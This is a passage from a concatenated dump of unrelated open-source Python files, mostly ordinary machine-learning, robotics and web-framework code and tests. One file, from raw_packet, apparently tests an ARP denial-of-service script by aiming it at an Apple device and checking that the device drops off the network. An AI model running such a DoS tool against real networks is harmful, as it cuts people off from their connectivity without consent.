1.0, (2, 4): 1.0, (3, 1): 1.0, (3, 5): 1.0} namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) } check('test_simpleVectorizer_binary',namedCols) def test_simpleVectorizer_triple(): text = '<drug id="1">Erlotinib</drug> is a common treatment for <cancer id="2">NSCLC</cancer> which targets <gene id="3">EGFR</gene>. <relation type="druginfo" drug="1" disease="2" gene="3" />' corpus = kindred.Corpus(text,loadFromSimpleTag=True) parser = kindred.Parser() parser.parse(corpus) candidateBuilder = kindred.CandidateBuilder(entityCount=3) candidateRelations = candidateBuilder.build(corpus) # We'll just get the vectors for the entityTypes vectorizer = kindred.Vectorizer(entityCount=3,featureChoice=["entityTypes"]) vectors = vectorizer.fit_transform(candidateRelations) vectorsCSR = vectors.tocsr() rows,cols = vectors.nonzero() expected = {(0, 1): 1.0, (0, 3): 1.0, (0, 8): 1.0, (1, 1): 1.0, (1, 5): 1.0, (1, 6): 1.0, (2, 0): 1.0, (2, 4): 1.0, (2, 8): 1.0, (3, 0): 1.0, (3, 5): 1.0, (3, 7): 1.0, (4, 2): 1.0, (4, 4): 1.0, (4, 6): 1.0, (5, 2): 1.0, (5, 3): 1.0, (5, 7): 1.0} namedCols = { str((r,c)):vectorsCSR[r,c] for r,c in zip(rows.tolist(),cols.tolist()) } check('test_simpleVectorizer_triple',namedCols) def test_vectorizer_defaults(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) vectorizer = kindred.Vectorizer() matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_defaults_1',namedCols1) colmeans2 = np.sum(matrix2,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_defaults_2',namedCols2) def test_vectorizer_entityTypes(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["entityTypes"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_entityTypes_1',namedCols1) colmeans2 = np.sum(matrix2,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_entityTypes_2',namedCols2) def test_vectorizer_unigramsBetweenEntities(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["unigramsBetweenEntities"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_unigramsBetweenEntities_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_unigramsBetweenEntities_2',namedCols2) def test_vectorizer_bigrams(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["bigrams"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_bigrams_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_bigrams_2',namedCols2) def test_vectorizer_dependencyPathEdges(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["dependencyPathEdges"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_dependencyPathEdges_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_dependencyPathEdges_2',namedCols2) def test_vectorizer_dependencyPathEdgesNearEntities(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["dependencyPathEdgesNearEntities"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=True) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_dependencyPathEdgesNearEntities_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_dependencyPathEdgesNearEntities_2',namedCols2) def test_vectorizer_entityTypes_noTFIDF(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["entityTypes"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_entityTypes_noTFIDF_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_entityTypes_noTFIDF_2',namedCols2) def test_vectorizer_unigramsBetweenEntities_noTFIDF(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["unigramsBetweenEntities"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_unigramsBetweenEntities_noTFIDF_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_unigramsBetweenEntities_noTFIDF_2',namedCols2) def test_vectorizer_bigrams_noTFIDF(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["bigrams"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_bigrams_noTFIDF_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_bigrams_noTFIDF_2',namedCols2) def test_vectorizer_dependencyPathEdges_noTFIDF(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["dependencyPathEdges"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_dependencyPathEdges_noTFIDF_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_dependencyPathEdges_noTFIDF_2',namedCols2) def test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF(): corpus1, _ = generateTestData(positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder() candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) chosenFeatures = ["dependencyPathEdgesNearEntities"] vectorizer = kindred.Vectorizer(featureChoice=chosenFeatures,tfidf=False) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_dependencyPathEdgesNearEntities_noTFIDF_2',namedCols2) def test_vectorizer_defaults_triple(): corpus1, _ = generateTestData(entityCount=3,positiveCount=5,negativeCount=5) corpus2, _ = generateTestData(entityCount=3,positiveCount=10,negativeCount=10) parser = kindred.Parser() parser.parse(corpus1) parser.parse(corpus2) candidateBuilder = kindred.CandidateBuilder(entityCount=3) candidateRelations1 = candidateBuilder.build(corpus1) candidateRelations2 = candidateBuilder.build(corpus2) vectorizer = kindred.Vectorizer(entityCount=3) matrix1 = vectorizer.fit_transform(candidateRelations1) matrix2 = vectorizer.transform(candidateRelations2) colnames = vectorizer.getFeatureNames() # As a quick check, we'll confirm that the column means are as expected colmeans1 = np.sum(matrix1,axis=0).tolist()[0] namedCols1 = { col:round(v,8) for col,v in zip(colnames,colmeans1) } check('test_vectorizer_defaults_triple_1',namedCols1) colmeans2 = np.sum(matrix1,axis=0).tolist()[0] namedCols2 = { col:round(v,8) for col,v in zip(colnames,colmeans2) } check('test_vectorizer_defaults_triple_2',namedCols2) if __name__ == '__main__': test_vectorizer_defaults_triple()
blackstone/displacy_palette.py
DeNeutoy/Blackstone
541
11096216
ner_displacy_palette = { "CASENAME": "#da3650", "CITATION": "#67328b", "JUDGE": "#00a594", "COURT": "#fcd548", "PROVISION": "#007bac", "INSTRUMENT": "#6c63a5", "CONCEPT": "#df5a35", } ner_displacy_options = { "ents": [ "CASENAME", "CITATION", "JUDGE", "COURT", "PROVISION", "INSTRUMENT", "CONCEPT", ], "colors": ner_displacy_palette, } dep_displacy_options = { "compact": False, "bg": "linear-gradient(90deg, #bdc3c7, #2c3e50)", "color": "white", "font": "Gotham", }
tests/layer_tests/onnx_tests/test_argmax.py
ryanloney/openvino-1
1,127
11096235
# Copyright (C) 2018-2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 import numpy as np import pytest from common.layer_test_class import check_ir_version from common.onnx_layer_test_class import OnnxRuntimeLayerTest from unit_tests.utils.graph import build_graph class TestArgMax(OnnxRuntimeLayerTest): def create_net(self, shape, axis, keepdims, ir_version): """ ONNX net IR net Input->ArgMax->Output => Input->TopK """ # # Create ONNX model # import onnx from onnx import helper from onnx import TensorProto output_shape = shape.copy() output_shape[axis if axis is not None else 0] = 1 output_shape_squeeze = output_shape.copy() if keepdims == 0: output_shape_squeeze.remove(1) input = helper.make_tensor_value_info('input', TensorProto.FLOAT, shape) output = helper.make_tensor_value_info('output', TensorProto.INT64, output_shape_squeeze) const = np.random.randint(-10, 10, output_shape_squeeze).astype(np.int64) args = dict() if axis is not None: args['axis'] = axis else: axis = 0 if keepdims is not None: args['keepdims'] = keepdims node_def = onnx.helper.make_node( 'ArgMax', inputs=['input'], outputs=['argmax' if keepdims is None or keepdims == 1 else 'output'], **args ) edges = [node_def] if keepdims is None or keepdims == 1: node_flatten_def = onnx.helper.make_node( 'Flatten', inputs=['argmax'], outputs=['output'] ) edges.append(node_flatten_def) # Create the graph (GraphProto) graph_def = helper.make_graph( edges, 'test_model', [input], [output], ) # Create the model (ModelProto) onnx_net = helper.make_model(graph_def, producer_name='test_model') # # Create reference IR net # ref_net = None if check_ir_version(10, None, ir_version): nodes_attributes = { 'input': {'kind': 'op', 'type': 'Parameter'}, 'input_data': {'shape': shape, 'kind': 'data'}, 'const_indata': {'shape': [1], 'kind': 'data'}, 'const': {'kind': 'op', 'type': 'Const'}, 'const_data': {'shape': [], 'kind': 'data'}, # TODO shape [] or [1] ?? 'node': {'kind': 'op', 'type': 'TopK'}, 'node_data': {'shape': output_shape, 'kind': 'data'}, 'indices_data': {'shape': output_shape, 'kind': 'data'}, 'result1': {'kind': 'op', 'type': 'Result'}, 'result2': {'kind': 'op', 'type': 'Result'} } edges = [('input', 'input_data'), ('const_indata', 'const'), ('const', 'const_data'), ('input_data', 'node'), ('const_data', 'node'), ('node', 'node_data'), ('node', 'indices_data'), ('node_data', 'result1')] if keepdims == 0: nodes_attributes.update({'squeeze_const_indata': {'shape': [1], 'kind': 'data'}, 'squeeze_const': {'kind': 'op', 'type': 'Const'}, 'squeeze_const_data': {'shape': [1], 'kind': 'data'}, 'squeeze': {'kind': 'op', 'type': 'Squeeze'}, 'squeeze_data': {'shape': output_shape_squeeze, 'kind': 'data'} }) edges.extend([('squeeze_const_indata', 'squeeze_const'), ('squeeze_const', 'squeeze_const_data'), ('indices_data', 'squeeze'), ('squeeze_const_data', 'squeeze'), ('squeeze', 'squeeze_data'), ('squeeze_data', 'result2')]) else: nodes_attributes.update( {'flatten_const_indata': {'kind': 'data', 'value': [0, -1]}, 'flatten_const': {'kind': 'op', 'type': 'Const'}, 'flatten_const_data': {'shape': [2], 'kind': 'data'}, 'flatten': {'kind': 'op', 'type': 'Reshape'}, 'flatten_data': { 'shape': [output_shape_squeeze[0], np.prod(output_shape_squeeze[1:])], 'kind': 'data'} }) edges.extend([('indices_data', 'flatten'), ('flatten_const_indata', 'flatten_const'), ('flatten_const', 'flatten_const_data'), ('flatten_const_data', 'flatten'), ('flatten', 'flatten_data'), ('flatten_data', 'result2')]) ref_net = build_graph(nodes_attributes, edges) return onnx_net, ref_net test_data = [ dict(shape=[10, 12], axis=None), dict(shape=[10, 12], axis=1), dict(shape=[8, 10, 12], axis=None), dict(shape=[8, 10, 12], axis=1), dict(shape=[8, 10, 12], axis=2), dict(shape=[6, 8, 10, 12], axis=None), dict(shape=[6, 8, 10, 12], axis=1), dict(shape=[6, 8, 10, 12], axis=2), dict(shape=[6, 8, 10, 12], axis=3), dict(shape=[4, 6, 8, 10, 12], axis=None), dict(shape=[4, 6, 8, 10, 12], axis=1), dict(shape=[4, 6, 8, 10, 12], axis=2), dict(shape=[4, 6, 8, 10, 12], axis=3), dict(shape=[4, 6, 8, 10, 12], axis=4)] @pytest.mark.parametrize("params", test_data) @pytest.mark.parametrize("keepdims", [None, 0]) @pytest.mark.nightly def test_argmax(self, params, keepdims, ie_device, precision, ir_version, temp_dir, api_2): self._test(*self.create_net(**params, ir_version=ir_version, keepdims=keepdims), ie_device, precision, ir_version, temp_dir=temp_dir, api_2=api_2)
metadrive/component/road_network/__init__.py
liuzuxin/metadrive
125
11096241
from metadrive.component.road_network.road import Road, Route from metadrive.component.road_network.node_road_network import NodeRoadNetwork
raw_packet/Tests/Unit_tests/Scripts/Apple/test_apple_arp_dos.py
Vladimir-Ivanov-Git/raw_packet
146
11096249
# region Description """ test_apple_arp_dos.py: Unit tests for Raw-packet script: apple_arp_dos.py Author: <NAME> License: MIT Copyright 2020, Raw-packet Project """ # endregion # region Import from sys import path from os.path import dirname, abspath from os import system, kill from signal import SIGTERM from time import sleep, time from subprocess import Popen, run, PIPE import unittest # endregion # region Authorship information __author__ = '<NAME>' __copyright__ = 'Copyright 2020, Raw-packet Project' __credits__ = [''] __license__ = 'MIT' __version__ = '0.2.1' __maintainer__ = '<NAME>' __email__ = '<EMAIL>' __status__ = 'Development' # endregion # region Main class - ScriptAppleArpDosTest class ScriptAppleArpDosTest(unittest.TestCase): # region Properties root_path = dirname(dirname(dirname(dirname(dirname(dirname(abspath(__file__))))))) path.append(root_path) from raw_packet.Utils.base import Base from raw_packet.Tests.Unit_tests.variables import Variables base: Base = Base() # endregion def kill_test_process(self) -> None: while self.base.get_process_pid('/apple_arp_dos.py') != -1: kill(self.base.get_process_pid('/apple_arp_dos.py'), SIGTERM) sleep(0.1) @staticmethod def restart_dhcp_server_over_ssh() -> None: run(['ssh ' + ScriptAppleArpDosTest.Variables.router_root_username + '@' + ScriptAppleArpDosTest.Variables.router_ipv4_address + ' "/etc/init.d/dnsmasq restart"'], shell=True) def check_apple_device_connected(self) -> None: self.kill_test_process() sleep(5) response: int = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address) if response == 0: return None else: self.restart_dhcp_server_over_ssh() while response != 0: response = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address) def test01_main_arp_scan(self): self.check_apple_device_connected() apple_arp_dos = Popen(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + ScriptAppleArpDosTest.Variables.test_network_interface], shell=True, stdout=PIPE) find_target: bool = False start_time = time() for output_line in apple_arp_dos.stdout: output_line: str = output_line.decode('utf-8') print(output_line[:-1]) if ScriptAppleArpDosTest.Variables.apple_device_ipv4_address in output_line: find_target = True break if int(time() - start_time) > 10: self.kill_test_process() break self.assertTrue(find_target) def test02_main_nmap_scan(self): self.check_apple_device_connected() apple_arp_dos = Popen(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + ScriptAppleArpDosTest.Variables.test_network_interface + ' -n'], shell=True, stdout=PIPE) find_target: bool = False start_time = time() for output_line in apple_arp_dos.stdout: output_line: str = output_line.decode('utf-8') print(output_line[:-1]) if ScriptAppleArpDosTest.Variables.apple_device_ipv4_address in output_line: find_target = True break if int(time() - start_time) > 120: self.kill_test_process() break self.assertTrue(find_target) def test03_main_bad_interface(self): apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + ScriptAppleArpDosTest.Variables.bad_network_interface], shell=True, stdout=PIPE) apple_arp_dos_output: bytes = apple_arp_dos.stdout apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8') print(apple_arp_dos_output) self.assertIn(ScriptAppleArpDosTest.Variables.bad_network_interface, apple_arp_dos_output) def test04_main_bad_target_ip(self): apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' + ScriptAppleArpDosTest.Variables.bad_ipv4_address], shell=True, stdout=PIPE) apple_arp_dos_output: bytes = apple_arp_dos.stdout apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8') print(apple_arp_dos_output) self.assertIn(ScriptAppleArpDosTest.Variables.bad_ipv4_address, apple_arp_dos_output) def test05_main_bad_target_mac(self): apple_arp_dos = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address + ' -m ' + ScriptAppleArpDosTest.Variables.bad_mac_address], shell=True, stdout=PIPE) apple_arp_dos_output: bytes = apple_arp_dos.stdout apple_arp_dos_output: str = apple_arp_dos_output.decode('utf-8') print(apple_arp_dos_output) self.assertIn(ScriptAppleArpDosTest.Variables.bad_mac_address, apple_arp_dos_output) def test06_main(self): self.check_apple_device_connected() command: str = 'python3 ' + self.root_path + '/Scripts/Apple/apple_arp_dos.py -i ' + \ ScriptAppleArpDosTest.Variables.test_network_interface + ' -t ' + \ ScriptAppleArpDosTest.Variables.apple_device_ipv4_address Popen(command, shell=True) sleep(10) response = system("ping -c 1 " + ScriptAppleArpDosTest.Variables.apple_device_ipv4_address) self.assertNotEqual(response, 0) self.check_apple_device_connected() # endregion
nuplan/common/utils/split_state.py
motional/nuplan-devkit
128
11096250
from dataclasses import dataclass from typing import Any, List @dataclass class SplitState: """Dataclass representing a state split between fixed states, linear states and angular states.""" linear_states: List[Any] # Variable states angular_states: List[float] # Variable states, representing angles, with 2pi period fixed_states: List[Any] # Constant states def __len__(self) -> int: """Returns the number of states""" return len(self.linear_states) + len(self.angular_states) + len(self.fixed_states)
guillotina/component/globalregistry.py
vinissimus/guillotina
173
11096257
############################################################################## # # Copyright (c) 2006 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## from guillotina.component._compat import _BLANK from guillotina.component.interfaces import IComponentLookup from guillotina.profile import profilable from typing import Type from zope.interface import implementer from zope.interface import providedBy from zope.interface.adapter import AdapterLookup from zope.interface.adapter import AdapterRegistry from zope.interface.registry import Components import asyncio import logging import os import time profile_logger = logging.getLogger("guillotina.profile") class GuillotinaAdapterLookup(AdapterLookup): @profilable async def asubscribers(self, objects, provided): subscriptions = self.subscriptions(map(providedBy, objects), provided) results = [] for subscription in sorted(subscriptions, key=lambda sub: getattr(sub, "priority", 100)): if asyncio.iscoroutinefunction(subscription): results.append(await subscription(*objects)) else: results.append(subscription(*objects)) return results @profilable def subscribers(self, objects, provided): subscriptions = self.subscriptions(map(providedBy, objects), provided) result = [] for subscription in sorted(subscriptions, key=lambda sub: getattr(sub, "priority", 100)): if not asyncio.iscoroutinefunction(subscription): result.append(subscription(*objects)) return result class DebugGuillotinaAdapterLookup(GuillotinaAdapterLookup): # pragma: no cover @profilable async def asubscribers(self, objects, provided): from guillotina.utils import get_current_request, get_authenticated_user_id, get_dotted_name from guillotina.exceptions import RequestNotFound from guillotina import task_vars if len(objects) > 1: event = get_dotted_name(objects[1]) context = getattr(objects[0], "__uuid__", None) else: event = get_dotted_name(objects[0]) context = None try: request = get_current_request() except RequestNotFound: request = None try: url = request.url.human_repr() except AttributeError: # older version of aiohttp url = "" info = { "url": url, "container": getattr(task_vars.container.get(), "id", None), "user": get_authenticated_user_id(), "db_id": getattr(task_vars.db.get(), "id", None), "request_uid": getattr(request, "_uid", None), "method": getattr(request, "method", None), "subscribers": [], "context": context, "event": event, } start = time.time() * 1000 subscriptions = sorted( self.subscriptions(map(providedBy, objects), provided), key=lambda sub: getattr(sub, "priority", 100), ) info["lookup_time"] = (time.time() * 1000) - start info["found"] = len(subscriptions) results = [] for subscription in subscriptions: start = time.time() * 1000 if asyncio.iscoroutinefunction(subscription): results.append(await subscription(*objects)) else: results.append(subscription(*objects)) info["subscribers"].append( {"duration": (time.time() * 1000) - start, "name": get_dotted_name(subscription)} ) info["duration"] = (time.time() * 1000) - start profile_logger.info(info) return results class GuillotinaAdapterRegistry(AdapterRegistry): """ Customized adapter registry for async """ LookupClass: Type[GuillotinaAdapterLookup] _delegated = AdapterRegistry._delegated + ("asubscribers",) # type: ignore if os.environ.get("GDEBUG_SUBSCRIBERS", "").lower() in ("1", "true", "t"): LookupClass = DebugGuillotinaAdapterLookup else: LookupClass = GuillotinaAdapterLookup def __init__(self, parent, name): self.__parent__ = parent self.__name__ = name super().__init__() @implementer(IComponentLookup) class GlobalComponents(Components): # type: ignore def _init_registries(self): self.adapters = GuillotinaAdapterRegistry(self, "adapters") self.utilities = GuillotinaAdapterRegistry(self, "utilities") def __reduce__(self): # Global site managers are pickled as global objects return self.__name__ base = GlobalComponents("base") def get_global_components(): return base def reset(): global base base = GlobalComponents("base") def provide_utility(component, provides=None, name=_BLANK): base.registerUtility(component, provides, name, event=False) def provide_adapter(factory, adapts=None, provides=None, name=_BLANK): base.registerAdapter(factory, adapts, provides, name, event=False) def provide_subscription_adapter(factory, adapts=None, provides=None): base.registerSubscriptionAdapter(factory, adapts, provides, event=False) def provide_handler(factory, adapts=None): base.registerHandler(factory, adapts, event=False)
tests/test_mask_utils_detectron2.py
mintar/mseg-api
213
11096279
<filename>tests/test_mask_utils_detectron2.py #!/usr/bin/env python3 import cv2 import matplotlib.pyplot as plt import numpy as np from mseg.utils.mask_utils_detectron2 import Visualizer def test_visualizer1() -> None: """ label map with four quadrants. | Sky | Road | ---------------- | Person | Horse | """ H = 640 W = 480 img_rgb = np.ones((H, W, 3), dtype=np.uint8) label_map = np.zeros((H, W), dtype=np.uint8) label_map[: H // 2, : W // 2] = 0 label_map[: H // 2, W // 2 :] = 1 label_map[H // 2 :, : W // 2] = 2 label_map[H // 2 :, W // 2 :] = 3 id_to_class_name_map = {0: "sky", 1: "road", 2: "person", 3: "horse"} vis_obj = Visualizer(img_rgb, None) output_img = vis_obj.overlay_instances(label_map, id_to_class_name_map) plt.imshow(output_img) # plt.show() plt.close("all") def test_visualizer2() -> None: """ Create label map with two embedded circles. Each circle represents class 1 (the "person" class). """ H = 640 W = 480 img_rgb = np.ones((H, W, 3), dtype=np.uint8) label_map = np.zeros((H, W), dtype=np.uint8) label_map[100, 300] = 1 label_map[100, 100] = 1 # only 2 pixels will have value 1 mask_diff = np.ones_like(label_map).astype(np.uint8) - label_map # Calculates the distance to the closest zero pixel for each pixel of the source image. distance_mask = cv2.distanceTransform( mask_diff, distanceType=cv2.DIST_L2, maskSize=cv2.DIST_MASK_PRECISE ) distance_mask = distance_mask.astype(np.float32) label_map = (distance_mask <= 25).astype(np.uint8) id_to_class_name_map = {0: "road", 1: "person"} # plt.imshow(label_map) # plt.show() vis_obj = Visualizer(img_rgb, None) output_img = vis_obj.overlay_instances(label_map, id_to_class_name_map) plt.imshow(output_img) # plt.show() plt.close("all") """ TODO: add more tests, e.g. with concentric circles """ if __name__ == "__main__": test_visualizer1() # test_visualizer2()
sdk-extension/opentelemetry-sdk-extension-aws/tests/resource/test_ecs.py
willarmiros/opentelemetry-python-contrib
208
11096289
